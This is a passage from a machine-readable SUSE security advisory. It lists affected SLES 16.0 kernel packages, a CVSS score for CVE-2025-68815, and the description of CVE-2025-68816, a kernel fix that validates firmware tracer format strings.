"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68815"
},
{
"cve": "CVE-2025-68816",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68816"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: fw_tracer, Validate format string parameters\n\nAdd validation for format string parameters in the firmware tracer to\nprevent potential security vulnerabilities and crashes from malformed\nformat strings received from firmware.\n\nThe firmware tracer receives format strings from the device firmware and\nuses them to format trace messages. Without proper validation, bad\nfirmware could provide format strings with invalid format specifiers\n(e.g., %s, %p, %n) that could lead to crashes, or other undefined\nbehavior.\n\nAdd mlx5_tracer_validate_params() to validate that all format specifiers\nin trace strings are limited to safe integer/hex formats (%x, %d, %i,\n%u, %llx, %lx, etc.). Reject strings containing other format types that\ncould be used to access arbitrary memory or cause crashes.\nInvalid format strings are added to the trace output for visibility with\n\"BAD_FORMAT: \" prefix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
